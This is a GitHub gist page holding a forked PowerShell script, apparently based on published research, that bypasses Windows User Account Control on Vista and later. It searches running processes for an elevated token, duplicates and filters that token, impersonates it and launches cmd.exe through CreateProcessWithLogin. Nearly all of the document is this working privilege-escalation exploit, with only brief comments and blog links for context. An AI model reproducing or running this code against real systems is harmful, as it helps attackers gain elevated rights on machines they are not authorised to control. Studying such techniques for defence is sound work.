Skip to content

Instantly share code, notes, and snippets.

@ahhh
Forked from tyranid/bypass_uac.ps1
Created September 27, 2019 21:50
Show Gist options
  • Save ahhh/1c750e9cbc3065a1f47472eae3bbcab6 to your computer and use it in GitHub Desktop.
Save ahhh/1c750e9cbc3065a1f47472eae3bbcab6 to your computer and use it in GitHub Desktop.
# Powershell script to bypass UAC on Vista+ assuming
# there exists one elevated process on the same desktop.
# Technical details in:
# https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-1.html
# https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-2.html
# https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-3.html
# You need to Install-Module NtObjectManager for this to run.
Import-Module NtObjectManager
# Function to find the first accessible elevated token.
function Get-ElevatedToken {
Param([switch]$NoFilter)
$token = $null
while ($true) {
Write-Host "Checking for elevated processes"
$token = Use-NtObject($ps = Get-NtProcess) {
foreach($p in $ps) {
try {
$ret = Use-NtObject($token = Get-NtToken -Primary `
-Process $p -Duplicate `
-IntegrityLevel Medium) {
if ($token.Elevated) {
Write-Host "Found elevated token in process $p - Pid $($p.ProcessId)"
return $token.Duplicate()
}
}
if ($ret -ne $null) {
return $ret
}
} catch {
}
}
}
if ($token -ne $null) {
break
}
Start-Sleep -Seconds 1
}
if (!$NoFilter) {
# Filter to remove elevated groups/privileges.
$token = Use-NtObject($token) {
Get-NtFilteredToken $token -Flags LuaToken
}
}
return $token
}
Use-NtObject($lua_token = Get-ElevatedToken) {
Use-NtObject($lua_token.Impersonate()) {
[SandboxAnalysisUtils.Win32Process]::CreateProcessWithLogin("Badger", "Badger", "Badger",
"NetCredentialsOnly", "cmd.exe", "cmd.exe", 0, "WinSta0\Default")
}
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment